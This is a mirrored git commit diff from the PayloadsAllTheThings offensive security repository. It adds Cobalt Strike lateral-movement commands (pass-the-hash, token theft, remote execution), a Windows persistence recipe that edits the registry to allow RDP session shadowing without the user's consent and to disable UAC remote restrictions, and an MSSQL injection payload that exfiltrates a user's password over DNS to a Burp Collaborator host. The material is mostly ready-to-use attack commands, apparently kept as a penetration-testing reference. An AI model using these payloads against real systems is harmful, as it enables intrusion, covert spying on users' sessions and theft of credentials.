wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-03 11:46:25 +02:00
Code Issues Releases Activity

Remote Desktop Services Shadowing

This commit is contained in:
Swissky 2020-10-30 21:10:00 +01:00
parent 4fe1d71ad8
commit 1137bfca8d
3 changed files with 54 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Methodology and Resources/Cobalt Strike - Cheatsheet.md
View File

@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe
## Lateral Movement
- **portscan:** Performs a portscan on a spesific target.
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
:exclamation: This module needs Administrator privileges.
- **steal_token:** Steal a token from a specified process.
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
:warning: All the commands launch powershell.exe
```powershell

26
Methodology and Resources/Windows - Persistence.md
View File

@ -25,6 +25,7 @@
* [RDP Backdoor](#rdp-backdoor)
* [utilman.exe](#utilman.exe)
* [sethc.exe](#sethc.exe)
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
* [References](#references)
@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```
### Remote Desktop Services Shadowing
:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.
Requirements:
* RDP must be running
```powershell
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
# 4 View Session without users permission.
# Allowing remote connections to this computer
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Disable UAC remote restriction
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowees session ID;
# /noconsentprompt parameter allows to bypass a shadowees permission and shadow their session without their consent;
# /prompt parameter is used to specify a users credentials to connect to a remote host.
```
### Skeleton Key
```powershell

18
SQL Injection/MSSQL Injection.md
View File

@ -15,7 +15,9 @@
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked query](#mssql-stacked-query)
* [MSSQL Command execution](#mssql-command-execution)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Out of band](#mssql-out-of-band)
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
* [MSSQL Trusted Links](#mssql-trusted-links)
@ -134,7 +136,7 @@ ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
```
## MSSQL Stacked Query
@ -187,8 +189,18 @@ print(sys.version)
GO
```
## MSSQL Out of band
## MSSQL UNC Path
### MSSQL DNS exfiltration
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
```powershell
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
```
### MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.